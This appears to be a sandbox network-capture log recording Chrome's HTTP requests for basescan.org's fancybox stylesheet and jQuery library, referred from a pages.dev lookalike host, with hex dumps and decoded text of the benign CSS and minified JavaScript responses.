                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC634OUTGET /assets/vendor/fancybox/jquery.fancybox.min.css?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:02 GMT
                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Mon, 11 Feb 2019 07:30:00 GMT
                                                                                                                                                                                                                                              ETag: W/"0c6f98dbc1d41:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 87381
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YFa06vbQFyolqF9e4fKBUFOLw%2F6WwZB6zHjzw1zwy%2F0BoGdG8ryCpOgz3Cg3ffIRY%2Bh8%2FeetGyEcTkKMeW6EXP8Mdl3NRykK3%2F8KeLV%2FNPTyo0w56kmycbeD0gyVSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2c65f1a42d5-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC563INData Raw: 33 31 66 62 0d 0a 62 6f 64 79 2e 63 6f 6d 70 65 6e 73 61 74 65 2d 66 6f 72 2d 73 63 72 6f 6c 6c 62 61 72 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 66 61 6e 63 79 62 6f 78 2d 61 63 74 69 76 65 7b 68 65 69 67 68 74 3a 61 75 74 6f 7d 2e 66 61 6e 63 79 62 6f 78 2d 69 73 2d 68 69 64 64 65 6e 7b 6c 65 66 74 3a 2d 39 39 39 39 70 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 21 69 6d 70 6f 72 74 61 6e 74 3b 74 6f 70 3a 2d 39 39 39 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 66 61 6e 63 79 62 6f 78 2d 63 6f 6e 74 61 69 6e 65 72 7b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 66 61 63 65 2d 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 30 3b
                                                                                                                                                                                                                                              Data Ascii: 31fbbody.compensate-for-scrollbar{overflow:hidden}.fancybox-active{height:auto}.fancybox-is-hidden{left:-9999px;margin:0;position:absolute!important;top:-9999px;visibility:hidden}.fancybox-container{-webkit-backface-visibility:hidden;height:100%;left:0;
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 7d 2e 66 61 6e 63 79 62 6f 78 2d 6f 75 74 65 72 7b 2d 77 65 62 6b 69 74 2d 6f 76 65 72 66 6c 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 61 75 74 6f 7d 2e 66 61 6e 63 79 62 6f 78 2d 62 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 31 65 31 65 31 65 3b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 69 6e 68 65 72 69 74 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 6f 70 61 63 69 74 79 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 34 37 2c 30 2c 2e 37 34 2c 2e 37 31 29 7d 2e 66 61 6e 63 79 62 6f 78 2d 69 73 2d
                                                                                                                                                                                                                                              Data Ascii: :absolute;right:0;top:0}.fancybox-outer{-webkit-overflow-scrolling:touch;overflow-y:auto}.fancybox-bg{background:#1e1e1e;opacity:0;transition-duration:inherit;transition-property:opacity;transition-timing-function:cubic-bezier(.47,0,.74,.71)}.fancybox-is-
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 30 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 3b 2d 77 65 62 6b 69 74 2d 6f 76 65 72 66 6c 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 3b 70 61 64 64 69 6e 67 3a 34 34 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 6f 70 3a 30 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 74 72 61 6e 73 66 6f 72 6d 2c 6f 70 61 63 69 74 79 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 72 6d 61 6c 3b 77 69 64 74 68 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 39 34 7d 2e 66 61 6e 63 79 62 6f 78 2d 73 6c 69 64 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70
                                                                                                                                                                                                                                              Data Ascii: ;height:100%;left:0;outline:none;overflow:auto;-webkit-overflow-scrolling:touch;padding:44px;position:absolute;text-align:center;top:0;transition-property:transform,opacity;white-space:normal;width:100%;z-index:99994}.fancybox-slide:before{content:"";disp
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 6f 78 2d 63 61 6e 2d 73 77 69 70 65 20 2e 66 61 6e 63 79 62 6f 78 2d 63 6f 6e 74 65 6e 74 7b 63 75 72 73 6f 72 3a 67 72 61 62 7d 2e 66 61 6e 63 79 62 6f 78 2d 69 73 2d 67 72 61 62 62 69 6e 67 20 2e 66 61 6e 63 79 62 6f 78 2d 63 6f 6e 74 65 6e 74 7b 63 75 72 73 6f 72 3a 67 72 61 62 62 69 6e 67 7d 2e 66 61 6e 63 79 62 6f 78 2d 63 6f 6e 74 61 69 6e 65 72 20 5b 64 61 74 61 2d 73 65 6c 65 63 74 61 62 6c 65 3d 74 72 75 65 5d 7b 63 75 72 73 6f 72 3a 74 65 78 74 7d 2e 66 61 6e 63 79 62 6f 78 2d 69 6d 61 67 65 2c 2e 66 61 6e 63 79 62 6f 78 2d 73 70 61 63 65 62 61 6c 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 30 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6d 61 78 2d 68
                                                                                                                                                                                                                                              Data Ascii: ox-can-swipe .fancybox-content{cursor:grab}.fancybox-is-grabbing .fancybox-content{cursor:grabbing}.fancybox-container [data-selectable=true]{cursor:text}.fancybox-image,.fancybox-spaceball{background:transparent;border:0;height:100%;left:0;margin:0;max-h
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 2e 32 73 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 76 69 73 69 62 69 6c 69 74 79 3a 69 6e 68 65 72 69 74 3b 77 69 64 74 68 3a 34 34 70 78 7d 2e 66 61 6e 63 79 62 6f 78 2d 62 75 74 74 6f 6e 2c 2e 66 61 6e 63 79 62 6f 78 2d 62 75 74 74 6f 6e 3a 6c 69 6e 6b 2c 2e 66 61 6e 63 79 62 6f 78 2d 62 75 74 74 6f 6e 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 63 63 63 7d 2e 66 61 6e 63 79 62 6f 78 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 66 61 6e 63 79 62 6f 78 2d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 2e 66 61 6e 63 79 62 6f 78 2d 62 75 74 74 6f 6e 2e 66 61 6e 63 79 62 6f 78 2d 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 7d 2e 66 61 6e 63 79
                                                                                                                                                                                                                                              Data Ascii: .2s;vertical-align:top;visibility:inherit;width:44px}.fancybox-button,.fancybox-button:link,.fancybox-button:visited{color:#ccc}.fancybox-button:hover{color:#fff}.fancybox-button:focus{outline:none}.fancybox-button.fancybox-focus{outline:1px dotted}.fancy
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 6e 63 79 62 6f 78 2d 63 61 6e 2d 70 61 6e 20 2e 66 61 6e 63 79 62 6f 78 2d 63 6c 6f 73 65 2d 73 6d 61 6c 6c 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 66 61 6e 63 79 62 6f 78 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 66 61 6e 63 79 62 6f 78 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6f 70 61 63 69 74 79 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 63 61 6c 63 28 35 30 25 20 2d 20 35 30 70 78 29 3b 77 69 64 74 68 3a 37 30 70 78 7d 2e 66 61 6e 63 79 62 6f 78 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 66 61 6e 63 79 62 6f 78 2d 62 75 74 74 6f 6e 20 64 69 76 7b 70 61 64 64 69 6e 67 3a 37 70 78 7d 2e 66 61 6e 63 79 62 6f 78 2d 6e 61
                                                                                                                                                                                                                                              Data Ascii: ncybox-can-pan .fancybox-close-small{display:none}.fancybox-navigation .fancybox-button{background-clip:content-box;height:100px;opacity:0;position:absolute;top:calc(50% - 50px);width:70px}.fancybox-navigation .fancybox-button div{padding:7px}.fancybox-na
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 23 38 38 38 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 68 65 69 67 68 74 3a 35 30 70 78 3b 6c 65 66 74 3a 35 30 25 3b 6d 61 72 67 69 6e 3a 2d 32 35 70 78 20 30 20 30 20 2d 32 35 70 78 3b 6f 70 61 63 69 74 79 3a 2e 37 3b 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 35 30 25 3b 77 69 64 74 68 3a 35 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 39 39 7d 40 6b 65 79 66 72 61 6d 65 73 20 61 7b 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 74 75 72 6e 29 7d 7d 2e 66 61 6e 63 79 62 6f 78 2d 61 6e 69 6d 61 74 65 64 7b 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69
                                                                                                                                                                                                                                              Data Ascii: #888;border-bottom-color:#fff;border-radius:50%;height:50px;left:50%;margin:-25px 0 0 -25px;opacity:.7;padding:0;position:absolute;top:50%;width:50px;z-index:99999}@keyframes a{to{transform:rotate(1turn)}}.fancybox-animated{transition-timing-function:cubi
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 72 6d 3a 73 63 61 6c 65 33 64 28 30 2c 30 2c 30 29 20 74 72 61 6e 73 6c 61 74 65 33 64 28 31 30 30 25 2c 30 2c 30 29 7d 2e 66 61 6e 63 79 62 6f 78 2d 66 78 2d 63 69 72 63 75 6c 61 72 2e 66 61 6e 63 79 62 6f 78 2d 73 6c 69 64 65 2d 2d 63 75 72 72 65 6e 74 7b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 31 29 20 74 72 61 6e 73 6c 61 74 65 5a 28 30 29 7d 2e 66 61 6e 63 79 62 6f 78 2d 66 78 2d 74 75 62 65 2e 66 61 6e 63 79 62 6f 78 2d 73 6c 69 64 65 2d 2d 70 72 65 76 69 6f 75 73 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 2d 31 30 30 25 2c 30 2c 30 29 20 73 63 61 6c 65 28 2e 31 29 20 73 6b 65 77 28 2d 31 30 64 65 67 29 7d 2e 66 61 6e 63 79 62 6f 78 2d 66 78 2d 74 75 62 65 2e 66 61 6e 63 79 62 6f 78
                                                                                                                                                                                                                                              Data Ascii: rm:scale3d(0,0,0) translate3d(100%,0,0)}.fancybox-fx-circular.fancybox-slide--current{opacity:1;transform:scaleX(1) translateZ(0)}.fancybox-fx-tube.fancybox-slide--previous{transform:translate3d(-100%,0,0) scale(.1) skew(-10deg)}.fancybox-fx-tube.fancybox
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 6e 6f 6e 65 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 66 61 6e 63 79 62 6f 78 2d 73 68 61 72 65 5f 5f 62 75 74 74 6f 6e 3a 6c 69 6e 6b 2c 2e 66 61 6e 63 79 62 6f 78 2d 73 68 61 72 65 5f 5f 62 75 74 74 6f 6e 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 66 61 6e 63 79 62 6f 78 2d 73 68 61 72 65 5f 5f 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 66 61 6e 63 79 62 6f 78 2d 73 68 61 72 65 5f 5f 62 75 74 74 6f 6e 2d 2d 66 62 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 62 35 39 39 38 7d 2e 66 61 6e 63 79 62 6f 78 2d 73 68 61 72 65 5f 5f 62 75 74 74 6f 6e 2d 2d 66 62 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                                                                                                                              Data Ascii: none;user-select:none;white-space:nowrap}.fancybox-share__button:link,.fancybox-share__button:visited{color:#fff}.fancybox-share__button:hover{text-decoration:none}.fancybox-share__button--fb{background:#3b5998}.fancybox-share__button--fb:hover{background
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1288INData Raw: 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 61 6e 63 79 62 6f 78 2d 74 68 75 6d 62 73 2d 78 20 2e 66 61 6e 63 79 62 6f 78 2d 74 68 75 6d 62 73 5f 5f 6c 69 73 74 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 66 61 6e 63 79 62 6f 78 2d 74 68 75 6d 62 73 2d 79 20 2e 66 61 6e 63 79 62 6f 78 2d 74 68 75 6d 62 73 5f 5f 6c 69 73 74 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 7b 77 69 64 74 68 3a 37 70 78 7d 2e 66 61 6e 63 79 62 6f 78 2d 74 68 75 6d 62 73 2d 79 20 2e 66 61 6e 63 79 62 6f 78 2d 74 68 75 6d 62 73 5f 5f 6c 69 73 74 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                                                                              Data Ascii: tion:relative;white-space:nowrap;width:100%}.fancybox-thumbs-x .fancybox-thumbs__list{overflow:hidden}.fancybox-thumbs-y .fancybox-thumbs__list::-webkit-scrollbar{width:7px}.fancybox-thumbs-y .fancybox-thumbs__list::-webkit-scrollbar-track{background:#fff


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              31192.168.2.549764104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC613OUTGET /assets/vendor/jquery/dist/jquery.min.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC815INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:02 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Thu, 17 Feb 2022 04:48:00 GMT
                                                                                                                                                                                                                                              ETag: W/"040158ab923d81:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58859
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ipx1pClBzIj03iZmE0hGPVO8aCex3gsJB2d%2BNoSZfU%2BGBLz99eykC3ocEmSyuMDuGdT90otlzTILXAlQd9HpRcxndPhRguPgo7Rk77JUqeJBifsKfUA%2F7duBbdx0BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2c65e41c330-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC554INData Raw: 37 63 37 31 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 74 29 20 7b 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 20 22 6f 62 6a 65 63 74 22 20 3d 3d 20 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 20 26 26 20 22 6f 62 6a 65 63 74 22 20 3d 3d 20 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3f 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3d 20 65 2e 64 6f 63 75 6d 65 6e 74 20 3f 20 74 28 65 2c 20 21 30 29 20 3a 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 20 69 66 20 28 21
                                                                                                                                                                                                                                              Data Ascii: 7c71/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function (e, t) { "use strict"; "object" == typeof module && "object" == typeof module.exports ? module.exports = e.document ? t(e, !0) : function (e) { if (!
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC1369INData Raw: 72 6e 20 74 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 20 65 29 20 7d 2c 20 75 20 3d 20 74 2e 70 75 73 68 2c 20 69 20 3d 20 74 2e 69 6e 64 65 78 4f 66 2c 20 6e 20 3d 20 7b 7d 2c 20 6f 20 3d 20 6e 2e 74 6f 53 74 72 69 6e 67 2c 20 76 20 3d 20 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 20 61 20 3d 20 76 2e 74 6f 53 74 72 69 6e 67 2c 20 6c 20 3d 20 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 20 79 20 3d 20 7b 7d 2c 20 6d 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 20 72 65 74 75 72 6e 20 22 66 75 6e 63 74 69 6f 6e 22 20 3d 3d 20 74 79 70 65 6f 66 20 65 20 26 26 20 22 6e 75 6d 62 65 72 22 20 21 3d 20 74 79 70 65 6f 66 20 65 2e 6e 6f 64 65 54 79 70 65 20 26 26 20 22 66 75 6e 63 74 69 6f 6e 22 20 21 3d 20 74 79 70 65 6f 66 20 65 2e 69 74
                                                                                                                                                                                                                                              Data Ascii: rn t.concat.apply([], e) }, u = t.push, i = t.indexOf, n = {}, o = n.toString, v = n.hasOwnProperty, a = v.toString, l = a.call(Object), y = {}, m = function (e) { return "function" == typeof e && "number" != typeof e.nodeType && "function" != typeof e.it
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC1369INData Raw: 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 74 29 20 7b 20 72 65 74 75 72 6e 20 6e 2e 63 61 6c 6c 28 65 2c 20 74 2c 20 65 29 20 7d 29 29 20 7d 2c 20 73 6c 69 63 65 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 20 61 72 67 75 6d 65 6e 74 73 29 29 20 7d 2c 20 66 69 72 73 74 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 30 29 20 7d 2c 20 6c 61 73 74 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 2d 31 29 20 7d 2c 20 65 76 65 6e 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 72 65 74 75 72 6e 20 74 68 69
                                                                                                                                                                                                                                              Data Ascii: ushStack(S.map(this, function (e, t) { return n.call(e, t, e) })) }, slice: function () { return this.pushStack(s.apply(this, arguments)) }, first: function () { return this.eq(0) }, last: function () { return this.eq(-1) }, even: function () { return thi
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC1369INData Raw: 29 20 7b 20 7d 2c 20 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 3a 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 20 76 61 72 20 74 2c 20 6e 3b 20 72 65 74 75 72 6e 20 21 28 21 65 20 7c 7c 20 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 20 21 3d 3d 20 6f 2e 63 61 6c 6c 28 65 29 29 20 26 26 20 28 21 28 74 20 3d 20 72 28 65 29 29 20 7c 7c 20 22 66 75 6e 63 74 69 6f 6e 22 20 3d 3d 20 74 79 70 65 6f 66 20 28 6e 20 3d 20 76 2e 63 61 6c 6c 28 74 2c 20 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 20 26 26 20 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 20 26 26 20 61 2e 63 61 6c 6c 28 6e 29 20 3d 3d 3d 20 6c 29 20 7d 2c 20 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 20 76 61 72 20 74 3b 20 66 6f 72 20 28 74 20 69 6e 20 65 29
                                                                                                                                                                                                                                              Data Ascii: ) { }, isPlainObject: function (e) { var t, n; return !(!e || "[object Object]" !== o.call(e)) && (!(t = r(e)) || "function" == typeof (n = v.call(t, "constructor") && t.constructor) && a.call(n) === l) }, isEmptyObject: function (e) { var t; for (t in e)
                                                                                                                                                                                                                                              2024-09-28 01:16:02 UTC1369INData Raw: 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 74 29 20 7b 20 6e 5b 22 5b 6f 62 6a 65 63 74 20 22 20 2b 20 74 20 2b 20 22 5d 22 5d 20 3d 20 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7d 29 3b 20 76 61 72 20 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 6e 29 20 7b 20 76 61 72 20 65 2c 20 64 2c 20 62 2c 20 6f 2c 20 69 2c 20 68 2c 20 66 2c 20 67 2c 20 77 2c 20 75 2c 20 6c 2c 20 54 2c 20 43 2c 20 61 2c 20 45 2c 20 76 2c 20 73 2c 20 63 2c 20 79 2c 20 53 20 3d 20 22 73 69 7a 7a 6c 65 22 20 2b 20 31 20 2a 20 6e 65 77 20 44 61 74 65 2c 20 70 20 3d 20 6e 2e 64 6f 63 75 6d 65 6e 74 2c 20 6b 20 3d 20 30 2c 20 72 20 3d 20 30 2c 20 6d 20 3d
                                                                                                                                                                                                                                              Data Ascii: Date RegExp Object Error Symbol".split(" "), function (e, t) { n["[object " + t + "]"] = t.toLowerCase() }); var d = function (n) { var e, d, b, o, i, h, f, g, w, u, l, T, C, a, E, v, s, c, y, S = "sizzle" + 1 * new Date, p = n.document, k = 0, r = 0, m =
